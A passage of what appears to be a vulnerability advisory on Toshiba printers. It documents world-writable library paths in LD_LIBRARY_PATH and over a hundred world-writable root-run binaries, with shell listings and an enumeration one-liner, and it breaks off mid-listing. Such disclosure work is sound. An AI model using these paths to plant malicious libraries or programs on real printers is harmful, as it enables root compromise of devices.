-la \/ramdisk\/al\/libGetNameInfoInterface.so<br \/>-rwxrwxrwx 1 root root 70813 Dec 6 02:02<br \/>\/ramdisk\/al\/libGetNameInfoInterface.so<br \/>bash-4.1# s -la \/ramdisk\/al\/libGetAddtInfoInterface.so<br \/>-rwxrwxrwx 1 root root 87311 Dec 6 02:02<br \/>\/ramdisk\/al\/libGetAddtInfoInterface.so<br \/>bash-4.1#<\/p>\n<p>We can confirm these 2 libraries are loaded within programs inside the printers.<\/p>\n<p>Using `\/proc\/$PID\/maps`, we can list the libraries loaded inside the<br \/>programs: these libraries are loaded inside all the programs running<br \/>as root and apache in the printers:<\/p>\n<p>bash-4.1# cd \/proc &amp;&amp; for i in *\/; do cat $i\/cmdline &amp;&amp; echo &amp;&amp;<br \/>grep ramdisk $i\/maps;done<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/nqnd<br \/>77788000-77797000 r-xp 00000000 00:0d 10712<br \/>\/ramdisk\/al\/libGetAddtInfoInterface.so<br \/>77797000-77799000 rw-p 0000e000 00:0d 10712<br \/>\/ramdisk\/al\/libGetAddtInfoInterface.so<br \/>77799000-777a4000 r-xp 00000000 00:0d 7014<br \/>\/ramdisk\/al\/libGetNameInfoInterface.so<br \/>777a4000-777a6000 rw-p 0000a000 00:0d 7014<br \/>\/ramdisk\/al\/libGetNameInfoInterface.so<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/nqcs<br \/>7776d000-7777c000 r-xp 00000000 00:0d 10712<br \/>\/ramdisk\/al\/libGetAddtInfoInterface.so<br \/>7777c000-7777e000 rw-p 0000e000 00:0d 10712<br \/>\/ramdisk\/al\/libGetAddtInfoInterface.so<br \/>7777e000-77789000 r-xp 00000000 00:0d 7014<br \/>\/ramdisk\/al\/libGetNameInfoInterface.so<br \/>77789000-7778b000 rw-p 0000a000 00:0d 7014<br \/>\/ramdisk\/al\/libGetNameInfoInterface.so<br \/>[&#8230;]\/usr\/local\/ebx\/bin\/httpd -f<br \/>\/encryption\/al\/network\/config\/httpd.conf -k start<br \/>777b5000-777c4000 r-xp 00000000 00:0d 10712<br \/>\/ramdisk\/al\/libGetAddtInfoInterface.so<br \/>777c4000-777c6000 rw-p 0000e000 00:0d 10712<br \/>\/ramdisk\/al\/libGetAddtInfoInterface.so<br \/>777c7000-777d2000 r-xp 00000000 00:0d 7014<br \/>\/ramdisk\/al\/libGetNameInfoInterface.so<br \/>777d2000-777d4000 rw-p 0000a000 00:0d 7014<br \/>\/ramdisk\/al\/libGetNameInfoInterface.so<br \/>\/usr\/local\/ebx\/bin\/httpd -f<br \/>\/encryption\/al\/network\/config\/httpd.conf -k start<br \/>777b5000-777c4000 r-xp 00000000 00:0d 10712<br \/>\/ramdisk\/al\/libGetAddtInfoInterface.so<br \/>777c4000-777c6000 rw-p 0000e000 00:0d 10712<br \/>\/ramdisk\/al\/libGetAddtInfoInterface.so<br \/>777c7000-777d2000 r-xp 00000000 00:0d 7014<br \/>\/ramdisk\/al\/libGetNameInfoInterface.so<br \/>777d2000-777d4000 rw-p 0000a000 00:0d 7014<br \/>\/ramdisk\/al\/libGetNameInfoInterface.so<br \/>[&#8230;].\/alusermgr<br \/>776f6000-77705000 r-xp 00000000 00:0d 10712<br \/>\/ramdisk\/al\/libGetAddtInfoInterface.so<br \/>77705000-77707000 rw-p 0000e000 00:0d 10712<br \/>\/ramdisk\/al\/libGetAddtInfoInterface.so<br \/>77707000-77712000 r-xp 00000000 00:0d 7014<br \/>\/ramdisk\/al\/libGetNameInfoInterface.so<br \/>77712000-77714000 rw-p 0000a000 00:0d 7014<br \/>\/ramdisk\/al\/libGetNameInfoInterface.so<br \/>.\/allicensemgmt<br \/>777dc000-777eb000 r-xp 00000000 00:0d 10712<br \/>\/ramdisk\/al\/libGetAddtInfoInterface.so<br \/>777eb000-777ed000 rw-p 0000e000 00:0d 10712<br \/>\/ramdisk\/al\/libGetAddtInfoInterface.so<br \/>777ed000-777f8000 r-xp 00000000 00:0d 7014<br \/>\/ramdisk\/al\/libGetNameInfoInterface.so<br \/>777f8000-777fa000 rw-p 0000a000 00:0d 7014<br \/>\/ramdisk\/al\/libGetNameInfoInterface.so<br \/>[&#8230;]\n<p>An attacker can remotely compromise any Toshiba printer.<\/p>\n<p>## Details &#8211; Local Privilege Escalation and Remote Code Execution<br \/>using insecure LD_LIBRARY_PATH<\/p>\n<p>Toshiba printers are vulnerable to a Local Privilege Escalation<br \/>vulnerability because of an insecure LD_LIBRARY_PATH variable. This<br \/>Local Privilege Escalation can be also exploited as a Remote Code<br \/>Execution by uploading a malicious library using the Pre-authenticated<br \/>Remote Code Execution as root or apache and multiple Local Privilege<br \/>Escalations vulnerability.<\/p>\n<p>Toshiba printers are configured with an insecure `$LD_LIBRARY_PATH` variable:<\/p>\n<p>bash-4.1# printenv|grep LD_LIBRARY_PATH<br \/>LD_LIBRARY_PATH=\/home\/SYSROM_SRC\/build\/release\/lib:\/mfp\/lib:\/home\/SYSROM_SRC\/NoBuildItems\/common\/lib:\/home\/SYSROM_SRC\/build\/thirdparty\/\/plugins\/\/platforminputcontexts\/:\/home\/SYSROM_SRC\/build\/release\/lib<br \/>bash-4.1#<\/p>\n<p>The `$LD_LIBRARY_PATH` variable contains 4 directories insecure<br \/>permissions (777) allowing any attacker to replace these libraries<br \/>with malicious libraries that will be then executed:<\/p>\n<p>&#8211; &#8211; `\/home\/SYSROM_SRC\/build\/release\/lib`<br \/>&#8211; &#8211; `\/mfp\/lib`<br \/>&#8211; &#8211; `\/home\/SYSROM_SRC\/NoBuildItems\/common\/lib`<br \/>&#8211; &#8211; `\/home\/SYSROM_SRC\/build\/thirdparty\/\/plugins\/\/platforminputcontexts\/`<\/p>\n<p>We can confirm these directories have insecure permissions and\/or the<br \/>files stored inside these directories have insecure permissions as<br \/>shown below:<\/p>\n<p>Insecure permissions of `\/home\/SYSROM_SRC\/build\/release\/lib`:<\/p>\n<p>bash-4.1# ls -la \/home\/SYSROM_SRC\/build\/release\/lib<br \/>total 391144<br \/>drwxrwxrwx 4 root root 65536 May 27 16:28 .<br \/>drwxrwxrwx 19 root root 4096 May 27 16:28 ..<br \/>lrwxrwxrwx 1 root root 38 Apr 6 2016 ImageMagick-6.3.3 -&gt;<br \/>..\/..\/thirdparty\/lib\/ImageMagick-6.3.3<br \/>lrwxrwxrwx 1 root root 38 Mar 14 16:27 ImageMagick-6.7.5 -&gt;<br \/>..\/..\/thirdparty\/lib\/ImageMagick-6.7.5<br \/>lrwxrwxrwx 1 root root 15 Mar 14 16:27 al8021XNMO.so -&gt;<br \/>al8021XNMO.so.0<br \/>-rwxrwxrwx 1 root root 223011 Dec 6 01:58 al8021XNMO.so.0<br \/>lrwxrwxrwx 1 root root 14 Mar 14 16:27 alDDNSNMO.so -&gt; alDDNSNMO.so.0<br \/>-rwxrwxrwx 1 root root 171442 Dec 6 01:59 alDDNSNMO.so.0<br \/>lrwxrwxrwx 1 root root 13 Mar 14 16:27 alDNSNMO.so -&gt; alDNSNMO.so.0<br \/>[&#8230;]\n<p>Insecure permissions of `\/mfp\/lib`:<\/p>\n<p>bash-4.1# ls -la \/mfp\/lib<br \/>total 344308<br \/>drwxr-xr-x 2 root root 12288 May 27 16:28 .<br \/>drwxr-xr-x 8 root root 4096 May 27 16:28 ..<br \/>-rwxrwxrwx 1 root root 75 Jan 11 2013 DirectoryCopy.txt<br \/>-rwxrwxrwx 1 root root 203 Jun 29 2017 SharedFiles.ini<br \/>-rwxrwxrwx 1 root root 6210326 Jun 9 2022 laser.so<br \/>-rwxrwxrwx 1 root root 11386849 Jun 9 2022 laserc1x.so<br \/>-rwxrwxrwx 1 root root 298388 Dec 17 2017 libAbbyyZlib.so<br \/>-rwxrwxrwx 1 root root 1518996 Dec 17 2017 libBarcode.so<br \/>-rwxrwxrwx 1 root root 1045032 Dec 17 2017<br \/>libBusinessCard.Analyser.so<br \/>[&#8230;]\n<p>Insecure permissions of `\/home\/SYSROM_SRC\/NoBuildItems\/common\/lib`:<\/p>\n<p>bash-4.1# ls -la \/home\/SYSROM_SRC\/NoBuildItems\/common\/lib<br \/>total 49580<br \/>drwxrwxrwx 2 root root 4096 May 27 16:27 .<br \/>drwxrwxrwx 4 root root 4096 Dec 6 00:21 ..<br \/>-rwxrwxrwx 1 root root 624082 Dec 6 04:53 libCryptolib.so<br \/>-rwxrwxrwx 1 root root 624082 Dec 6 04:53 libCryptolib.so.0<br \/>-rwxrwxrwx 1 root root 624082 Apr 20 2018 libCryptolib.so.0.0.0<br \/>-rwxrwxrwx 1 root root 22366570 Jun 4 2018 libFREmbed.so<br \/>lrwxrwxrwx 1 root root 14 Mar 14 16:27 libasicif.so -&gt; libasicif.so.1<br \/>lrwxrwxrwx 1 root root 16 Mar 14 16:27 libasicif.so.1 -&gt;<br \/>libasicif.so.1.0<br \/>-rwxrwxrwx 1 root root 12649 Apr 2 2016 libasicif.so.1.0<br \/>[&#8230;]\n<p>Insecure permissions of<br \/>`\/home\/SYSROM_SRC\/build\/thirdparty\/\/plugins\/\/platforminputcontexts\/`:<\/p>\n<p>bash-4.1# ls -la<br \/>\/home\/SYSROM_SRC\/build\/thirdparty\/\/plugins\/\/platforminputcontexts\/<br \/>total 13036<br \/>drwxrwxrwx 2 510 510 4096 Sep 13 2019 .<br \/>drwxrwxrwx 18 510 510 4096 Sep 13 2019 ..<br \/>-rwxrwxrwx 1 510 510 84844 Aug 25 2016<br \/>libibusplatforminputcontextplugin.so<br \/>-rwxrwxrwx 1 510 510 13252081 Sep 13 2019 libscreenkeyboardplugin.so<br \/>bash-4.1#<\/p>\n<p>On a side note, all the libraries have also insecure permissions in<br \/>the previous listing.<\/p>\n<p>An attacker can remotely compromise any Toshiba printer.<\/p>\n<p>## Details &#8211; Local Privilege Escalation and Remote Code Execution<br \/>using insecure permissions for 106 programs<\/p>\n<p>Some vendor-specific programs are running inside Toshiba printers.<br \/>These programs run as root and have insecure permissions (777)<br \/>allowing an attacker to replace these programs with malicious<br \/>programs. This Local Privilege Escalation can be also exploited as a<br \/>Remote Code Execution by uploading a malicious program using the<br \/>Pre-authenticated Remote Code Execution as root or apache and multiple<br \/>Local Privilege Escalations vulnerability.<\/p>\n<p>Some programs are running as root, for example:<\/p>\n<p>bash-4.1# ps auxw | grep root<br \/>root 1448 0.0 0.7 143680 21860 ? Sl 16:34 0:00<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/slapd -h ldap:\/\/127.0.0.1 -f<br \/>\/home\/SYSROM_SRC\/build\/release\/etc\/openldap\/slapd.conf -d 1<br \/>root 1460 0.0 0.2 387308 8036 ? Sl 16:34 0:02<br \/>\/home\/SYSROM_SRC\/bin\/mapper firstboot=0<br \/>[&#8230;]root 1487 0.0 0.3 53496 10184 ? Sl 16:34 0:02<br \/>.\/cissm -T 7 -d ssm.xml<br \/>root 1647 0.0 0.3 67568 9256 ? Sl 16:34 0:02<br \/>.\/cischeduler -S ramdisk<br \/>root 1648 0.0 0.3 49452 11852 ? Sl 16:34 0:00<br \/>.\/cisystemresourcemanager -T8<br \/>root 1650 0.0 0.3 50320 11112 ? S 16:34 0:00<br \/>.\/pipeMN -T8<br \/>root 1652 0.0 0.3 47372 10708 ? S 16:34 0:00 .\/cpe -T8<br \/>root 1653 0.0 0.2 35524 8888 ? S 16:34 0:00 .\/dem -T8<br \/>root 1654 0.0 0.4 53448 12588 ? S 16:34 0:00 .\/dim -T8<br \/>root 1655 0.1 0.4 96460 12128 ? Sl 16:34 0:18<br \/>.\/alboserver -T5<br \/>[&#8230;]\n<p>Using this one-liner, it is possible to list the file corresponding to<br \/>programs running inside the printers:<\/p>\n<p>Programs running as root:<\/p>\n<p>bash-4.1# for i in $(ps auxww | grep root | awk &#8216;{ print $11 }&#8217; |<br \/>grep -v &#8216;^\\[&#8216; | grep -v COMMAND | grep -v &#8216;(&#8216; | grep -v &#8216;:$&#8217; | grep -v<br \/>&#8216;supervising&#8217; | sort | uniq); do ls -la $(which &#8220;$(echo $i | sed -e<br \/>&#8216;s#^\\.\/##&#8217;)&#8221;);done<\/p>\n<p>Running with a different user:<\/p>\n<p>for i in $(ps auxww | grep -v root | awk &#8216;{ print $11 }&#8217; | grep -v<br \/>&#8216;^\\[&#8216; | grep -v COMMAND | grep -v &#8216;(&#8216; | grep -v &#8216;:$&#8217; | grep -v<br \/>&#8216;supervising&#8217; | sort | uniq); do ls -la $(which &#8220;$(echo $i | sed -e<br \/>&#8216;s#^\\.\/##&#8217;)&#8221;);done<\/p>\n<p>These commands allow to list 106 vulnerable programs found inside the printers.<\/p>\n<p>### 3 vulnerable programs not running as root<\/p>\n<p>3 programs have been identified as vulnerable (running with a<br \/>low-privileged user and that can be overwritten by any local or remote<br \/>attacker):<\/p>\n<p>&#8211; &#8211; \/home\/SYSROM_SRC\/thirdparty\/sbin\/slpd<br \/>&#8211; &#8211; \/usr\/local\/ebx\/bin\/httpd<br \/>&#8211; &#8211; \/usr\/local\/ebx\/httpd_worker\/bin\/httpd_worker<\/p>\n<p>Vulnerable programs not running as root:<\/p>\n<p>bash-4.1# for i in $(ps auxww | grep -v root | awk &#8216;{ print $11 }&#8217;<br \/>| grep -v &#8216;^\\[&#8216; | grep -v COMMAND | grep -v &#8216;(&#8216; | grep -v &#8216;:$&#8217; | grep<br \/>-v &#8216;supervising&#8217; | sort | uniq); do ls -la $(which &#8220;$(echo $i | sed -e<br \/>&#8216;s#^\\.\/##&#8217;)&#8221;);done<\/p>\n<p>lrwxrwxrwx 1 root root 26 Mar 14 16:27 \/home\/SYSROM_SRC\/bin\/slpd<br \/>-&gt; ..\/..\/thirdparty\/sbin\/slpd<br \/>-rwxrwxrwx 1 apache messagebus 656546 Dec 6 01:34 \/usr\/local\/ebx\/bin\/httpd<br \/>-rwxrwxrwx 1 apache messagebus 665612 Dec 6 01:34<br \/>\/usr\/local\/ebx\/httpd_worker\/bin\/httpd_worker<br \/>bash-4.1#<\/p>\n<p>When following the link to slpd, we can confirm it is also vulnerable:<\/p>\n<p>bash-4.1# ls -la \/home\/SYSROM_SRC\/build\/thirdparty\/sbin\/slpd<br \/>-rwxrwxrwx 1 root root 106023 Dec 6 01:27<br \/>\/home\/SYSROM_SRC\/build\/thirdparty\/sbin\/slpd<br \/>bash-4.1#<\/p>\n<p>### 103 vulnerable programs running as root<\/p>\n<p>103 programs have been identified as vulnerable (running as root and<br \/>that can be overwritten by any local or remote attacker):<\/p>\n<p>&#8211; &#8211; \/home\/SYSROM_SRC\/bin\/alllmnr<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/bin\/dnsValidateDaemon<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/bin\/eBXDebugLogUtility<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/bin\/ipv6_daemon<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/bin\/mapper<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/bin\/syscallerr<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/agent_faxreceive<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/agent_faxtransmit<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/agent_ipfaxreceive<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/agent_ipfaxtransmit<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/agent_print<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/agent_rip<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/agent_scan<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/alaccountmgr<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/alAddressBookMgr<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/alappmanager<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/alboserver<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/alcbamanager<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/alCloning<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/aldevauthmgmtplugin<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/aldeviceconfigplugin<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/aldeviceserviceplugin<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/aleFilingmgr<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/aleSCL<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/alExportImport<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/alfilestoragem<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/alftpprintd<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/algrpmgr<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/alhddalertmgr<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/alhddbackuprestore<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/alhomedatamgr<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/alhp9100<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/alifaxreceive<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/alintegritychkmgr<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/aljobcontroller<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/aljobtemplatemgr<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/allicensemgmt<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/allld2d<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/alLogmanager<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/alLogRetriever<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/allprng<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/almailboxapplication<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/almaintenanceplugin<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/alnetefiRemoteifsr<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/alnfcplugin<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/alnsm<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/alpanel<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/alPanelStartLEDHandler<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/alPanelUIMessageHandler<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/alpdlfiltermanager<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/alpresentationresourcemgr<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/alprintmn<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/alreportmanager<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/alreportsmsgr<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/alrestrictionmode<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/alrolemgr<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/alsecurityconfiguration<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/alServiceUIPlugin<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/alsharedprintDp<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/alsoftwareupdateclient<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/alstage2<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/alUiFrameWork<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/alulm<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/alusbmscapplication<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/alusbPrint<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/aluserAuthMgr<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/alusermgr<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/alViewPlugin<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/alwsdiscovery<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/alwsmex<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/alwsprint<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/alwsscanner<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/armn<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/cipollproc<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/ciprioritymanager<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/cischeduler<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/cissm<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/cisystemresourcemanager<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/cpe<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/de_ipfax<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/dem<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/dim<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/ebx_dl<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/faxmilter<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/informationservice<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/notificationservice<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/pipeMN<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/sim<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/sljobmanagement<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/snmp_watchdog<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/ssdktimestamp<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/release\/bin\/wfpc<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/thirdparty\/bin\/alipp<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/thirdparty\/bin\/dibbler-client<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/thirdparty\/bin\/mDNSResponderPosix<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/thirdparty\/bin\/nqcs<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/thirdparty\/bin\/nqnd<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/thirdparty\/bin\/python3.5<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/thirdparty\/bin\/vsftpd<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/thirdparty\/libexec\/slapd<br \/>&#8211; &#8211; \/home\/SYSROM_SRC\/build\/thirdparty\/sbin\/snmpd<br \/>&#8211; &#8211; \/usr\/local\/ebx\/bin\/httpd<br \/>&#8211; &#8211; \/usr\/local\/ebx\/httpd_worker\/bin\/httpd_worker<\/p>\n<p>The analysis is shown below.<\/p>\n<p>Vulnerable programs running as root, with insecure permissions:<\/p>\n<p>bash-4.1# for i in $(ps auxww | grep root | awk &#8216;{ print $11 }&#8217; |<br \/>grep -v &#8216;^\\[&#8216; | grep -v COMMAND | grep -v &#8216;(&#8216; | grep -v &#8216;:$&#8217; | grep -v<br \/>&#8216;supervising&#8217; | sort | uniq); do ls -la $(which &#8220;$(echo $i | sed -e<br \/>&#8216;s#^\\.\/##&#8217;)&#8221;);done<br \/>-rwxrwxrwx 1 root root 562669 Dec 6 04:10<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/agent_faxreceive<br \/>-rwxrwxrwx 1 root root 608397 Dec 6 04:11<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/agent_faxtransmit<br \/>-rwxrwxrwx 1 root root 561916 Dec 6 04:38<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/agent_ipfaxreceive<br \/>-rwxrwxrwx 1 root root 594505 Dec 6 04:38<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/agent_ipfaxtransmit<br \/>-rwxrwxrwx 1 root root 572434 Dec 6 04:11<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/agent_print<br \/>-rwxrwxrwx 1 root root 556369 Dec 6 04:10<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/agent_rip<br \/>-rwxrwxrwx 1 root root 557372 Dec 6 04:10<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/agent_scan<br \/>-rwxrwxrwx 1 root root 2191621 Dec 6 02:13<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/alAddressBookMgr<br \/>-rwxrwxrwx 1 root root 939045 Dec 6 02:22<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/alCloning<br \/>-rwxrwxrwx 1 root root 1019576 Dec 6 02:20<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/alExportImport<br \/>-rwxrwxrwx 1 root root 1354094 Dec 6 02:15<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/alLogRetriever<br \/>-rwxrwxrwx 1 root root 734343 Dec 6 02:21<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/alLogmanager<br \/>-rwxrwxrwx 1 root root 241886 Dec 6 02:24<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/alPanelStartLEDHandler<br \/>-rwxrwxrwx 1 root root 2282226 Dec 6 02:24<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/alPanelUIMessageHandler<br \/>-rwxrwxrwx 1 root root 211250 Dec 6 02:22<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/alServiceUIPlugin<br \/>-rwxrwxrwx 1 root root 6104526 Dec 6 03:51<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/alUiFrameWork<br \/>-rwxrwxrwx 1 root root 673942 Dec 6 02:20<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/alViewPlugin<br \/>-rwxrwxrwx 1 root root 2896387 Dec 6 02:12<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/alaccountmgr<br \/>-rwxrwxrwx 1 root root 2917038 Dec 6 02:26<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/alappmanager<br \/>-rwxrwxrwx 1 root root 1055271 Dec 6 01:49<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/alboserver<br \/>-rwxrwxrwx 1 root root 322981 Dec 6 02:08<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/alcbamanager<br \/>-rwxrwxrwx 1 root root 2528851 Dec 6 02:22<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/aldevauthmgmtplugin<br \/>-rwxrwxrwx 1 root root 4386856 Dec 6 03:30<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/aldeviceconfigplugin<br \/>-rwxrwxrwx 1 root root 4300169 Dec 6 03:25<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/aldeviceserviceplugin<br \/>-rwxrwxrwx 1 root root 1915456 Dec 6 02:14<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/aleFilingmgr<br \/>-rwxrwxrwx 1 root root 580229 Dec 6 01:50<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/alfilestoragem<br \/>-rwxrwxrwx 1 root root 509900 Dec 6 02:21<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/algrpmgr<br \/>-rwxrwxrwx 1 root root 441641 Dec 6 02:24<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/alhddalertmgr<br \/>-rwxrwxrwx 1 root root 696894 Dec 6 02:24<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/alhddbackuprestore<br \/>-rwxrwxrwx 1 root root 829606 Dec 6 02:16<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/alhomedatamgr<br \/>-rwxrwxrwx 1 root root 606628 Dec 6 03:28<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/alifaxreceive<br \/>-rwxrwxrwx 1 root root 162074 Dec 6 02:22<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/alintegritychkmgr<br \/>-rwxrwxrwx 1 root root 4414769 Dec 6 02:08<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/aljobcontroller<br \/>-rwxrwxrwx 1 root root 2832921 Dec 6 02:15<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/aljobtemplatemgr<br \/>-rwxrwxrwx 1 root root 434559 Dec 6 02:22<br \/>\/home\/SYSROM_SRC\/build\/release\/bin\/allicensemgmt<br \/>-rwxrwxrwx 1 root root 1258130 Dec 